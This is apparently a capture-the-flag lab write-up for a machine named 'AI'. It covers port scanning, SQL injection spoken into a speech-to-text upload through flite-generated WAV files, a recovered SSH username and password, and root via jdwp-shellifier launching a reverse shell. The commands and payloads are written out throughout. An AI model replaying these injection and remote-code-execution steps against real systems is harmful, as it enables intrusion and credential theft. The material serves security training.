Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 12:01 IST
Nmap scan report for 10.10.10.163
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Hello AI!
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.12 seconds
Ran a gobuster on port 80
/.php [33m (Status: 403)[0m [Size: 277]
/images [36m (Status: 301)[0m [Size: 313][34m [--> http://10.10.10.163/images/][0m
/index.php [32m (Status: 200)[0m [Size: 37347]
/contact.php [32m (Status: 200)[0m [Size: 37371]
/about.php [32m (Status: 200)[0m [Size: 37503]
/uploads [36m (Status: 301)[0m [Size: 314][34m [--> http://10.10.10.163/uploads/][0m
/db.php [32m (Status: 200)[0m [Size: 0]
/intelligence.php [32m (Status: 200)[0m [Size: 38674]
/ai.php [32m (Status: 200)[0m [Size: 37569]
/.php [33m (Status: 403)[0m [Size: 277]
/server-status [33m (Status: 403)[0m [Size: 277]
Intelligence.php
On AI.php we can upload files ->
uploading php or other files does not give any error but it does not do anything either
From intelligence.php we can we can gues that it wants an wav file and it is doing some kind of wav to text.
I ll create a wav file with flite which helps in converting text to audio.
sudo apt install flite
flite -w hello.wav -voice rms -t "hello"
I ll upload the hello.wav and look at the results.
I get a hello
The query result is empty and thinking about query there is also sql statement like comment. I ll try to put a single quotes
flite -w hello.wav -voice rms -t "open single quote"
And I get a sql error Now I ll try to get some creds.
I could have used information_schema to know the table name but I guessed it right, and got a username
flite -w hello.wav -voice rms -t "open single quote space union select space username space from users comment database"
Now for the password
alexa:H,Sq9t6}a<)?q93_
I ssh in with the creds.
Got it
Linpeas...
jdwp is marked yellow this could be the way to be root.
Its running on port 8000
alexa@AI:/tmp$ netstat -tunlp | grep 127
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:*
I ll forward port 8000,8009,8080 to my machine
ssh alexa@ai.htb -L 8009:localhost:8009 -L 8080:localhost:8080 -L 8000:localhost:8000
googled around jdwp and privilege escalation and found some posts.
Which linked [jdwp-shellifier][https://github.com/hugsy/jdwp-shellifier]
I ll use this to execute command
Created a reverse shell on the target. and started a netcat listener on port 9001
python3 jdwp-shellifier.py -t 127.0.0.1 --break-on 'java.lang.String.indexOf' --cmd 'bash /tmp/hello.sh'
Got a shell
Root